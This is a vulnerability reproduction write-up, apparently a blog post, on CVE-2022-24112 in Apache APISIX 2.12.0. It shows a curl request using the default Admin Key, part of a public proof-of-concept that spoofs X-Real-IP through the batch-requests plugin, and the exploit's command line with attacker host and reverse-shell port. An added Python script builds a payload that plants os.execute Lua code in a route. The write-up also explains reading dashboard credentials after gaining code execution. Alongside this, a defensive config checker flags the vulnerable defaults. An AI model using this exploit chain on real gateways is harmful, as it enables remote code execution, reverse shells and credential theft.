CVE-2022-24112 Apache APISIX Command Execution Vulnerability Reappears


Apache APISIX is a dynamic, real-time, high-performance cloud-native API gateway under the Apache Software Foundation. It provides load balancing, dynamic upstreams, gray (canary) release, circuit breaking, authentication, observability and other traffic-management features.

When the batch-requests plugin is enabled, an attacker can use it to bypass the IP restrictions of the Apache APISIX data plane (for example, IP allow/deny lists): the plugin replays the caller's sub-requests against the gateway itself, and in affected versions the caller could supply its own X-Real-IP header for those sub-requests, so the Admin API's IP allow-list saw a spoofed client address. If APISIX runs with its default configuration (Admin API enabled, default Admin Key, and no separate admin port allocated), the attacker can call the Admin API through the batch-requests plugin and obtain remote code execution. The lab below runs APISIX 2.12.0, which is affected; the fix shipped in 2.12.1 and in the 2.10.4 LTS release.

Vulnerability background: CVE-2022-24112: Apache APISIX Command Execution Vulnerability

After the environment is started, the dashboard is reachable on port 9000, and the gateway, which also serves the Admin API, listens on port 9080. A curl against the Admin API with the default key confirms that the default key is accepted (the Server header also shows the affected version):

ocean@OceandeMBP ~ % curl 'http://192.168.186.148:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Fri, 24 Mar 2023 03:27:45 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600

{
    "action": "get",
    "count": 0,
    "node": {
        "dir": true,
        "key": "\/apisix\/routes",
        "nodes": {}
    }
}

poc:https://github.com/twseptian/cve-2022-24112

The PoC works in two steps: it bypasses the Admin API's IP check by supplying its own X-Real-IP header in the batch request, and it authenticates to the Admin API with the default key. The relevant part of exp.py is the header block of the batch-requests body:

        target_ip = '192.168.186.148'  # victim gateway; taken from the -t argument in exp.py

        json_data = {
            'headers': {
                # Attached to every sub-request of the batch. In affected versions the
                # plugin let this value replace the real client address, so the Admin
                # API's IP allow-list is checked against the spoofed address.
                'X-Real-IP': '{}:8080'.format(target_ip),
                # Default Admin Key from config-default.yaml
                'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
                'Content-Type': 'application/json',
            },
            # exp.py continues here with the 'pipeline' list holding the PUT sub-request
        }

The pipeline then carries a PUT request that adds a route whose filter_func holds Lua code; that code is executed when the route is matched. Run the exploit as follows:

python3 exp.py -t <victim host> -p <port the service runs on> -L <attacker host> -P <port listening for the reverse shell>
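To make the request structure concrete, here is an added Python example (not part of the original post or of the linked PoC) that builds the batch-requests body the text describes, and, on the defender side, flags the default-configuration conditions the advisory names. The route id, the upstream node value, the single-line Lua wrapper around os.execute, the spoofed X-Real-IP value and the sample configs are my assumptions; the config keys (apisix.enable_admin, apisix.admin_key, apisix.port_admin, top-level plugins) assume the APISIX 2.x config.yaml layout.

```python
import json

# Default Admin Key shipped in APISIX 2.x config-default.yaml (shown on the page)
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"


def build_batch_payload(target_ip, route_id, command, api_key=DEFAULT_ADMIN_KEY):
    """Return the JSON body for POST /apisix/batch-requests.

    The batch-requests plugin replays each `pipeline` entry against the gateway
    itself, attaching the top-level `headers`. In affected versions the caller's
    X-Real-IP survived into the sub-request, so the Admin API's IP allow-list
    saw the spoofed address instead of the real client.
    """
    # Minimal Lua escaping so the command fits inside a single-quoted string.
    lua_cmd = command.replace("\\", "\\\\").replace("'", "\\'")
    route = {
        "uri": "/" + route_id,
        # Upstream is irrelevant for the attack: filter_func runs before proxying.
        # Assumed node value, not taken from the page.
        "upstream": {"type": "roundrobin", "nodes": {"127.0.0.1:9080": 1}},
        # filter_func is Lua evaluated on every request that matches the route.
        "filter_func": "function(vars) os.execute('%s'); return true end" % lua_cmd,
    }
    return {
        "headers": {
            "X-Real-IP": target_ip,           # spoofed source address (assumed value)
            "X-API-KEY": api_key,             # default key authenticates to the Admin API
            "Content-Type": "application/json",
        },
        "timeout": 1500,
        "pipeline": [
            {
                "method": "PUT",
                "path": "/apisix/admin/routes/" + route_id,
                "body": json.dumps(route),    # sub-request body travels as a string
            }
        ],
    }


def exposure_findings(conf):
    """List which of the advisory's default-configuration conditions hold.

    `conf` mirrors the top-level keys of APISIX 2.x conf/config.yaml; that
    layout is an assumption about 2.x, not something the page shows.
    """
    apisix = conf.get("apisix", {})
    findings = []
    if apisix.get("enable_admin", True):      # 2.x enables the Admin API when omitted
        findings.append("Admin API enabled")
    if any(e.get("key") == DEFAULT_ADMIN_KEY for e in apisix.get("admin_key", [])):
        findings.append("default Admin Key in use")
    if apisix.get("port_admin") is None:
        findings.append("Admin API served on the data-plane port (no port_admin)")
    if "batch-requests" in conf.get("plugins", []):
        findings.append("batch-requests plugin enabled")
    return findings


# Constructed sample configs for the two cases (not copied from any real deployment).
VULNERABLE_CONF = {
    "apisix": {
        "enable_admin": True,
        "admin_key": [{"name": "admin", "key": DEFAULT_ADMIN_KEY, "role": "admin"}],
    },
    "plugins": ["batch-requests", "limit-count"],
}

HARDENED_CONF = {
    "apisix": {
        "enable_admin": True,
        # placeholder for a freshly generated key
        "admin_key": [{"name": "admin", "key": "0123456789abcdef0123456789abcdef", "role": "admin"}],
        "port_admin": 9180,  # separate admin listener that can be firewalled off
    },
    "plugins": ["limit-count"],
}

if __name__ == "__main__":
    payload = build_batch_payload("192.168.186.148", "cve-2022-24112-demo", "id")
    print(json.dumps(payload, indent=2))
    print("vulnerable:", exposure_findings(VULNERABLE_CONF))
    print("hardened:", exposure_findings(HARDENED_CONF))
```

The payload is what exp.py POSTs to /apisix/batch-requests on the gateway port; once the route exists, any request to the new uri on port 9080 runs filter_func, which is how the reverse shell in the write-up is triggered. On the defender side, rotating the Admin Key, setting port_admin to a separate, firewalled listener and disabling batch-requests where it is not needed remove the conditions the exploit relies on, independently of upgrading.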


The APISIX Dashboard login credentials are stored in the dashboard's api/conf/conf.yaml file, which can be read through the command execution obtained above.


Logging in to the dashboard shows the route added by the exploit. Its filter_func calls the Lua os.execute() function to spawn the reverse shell.



Origin blog.csdn.net/q20010619/article/details/130010983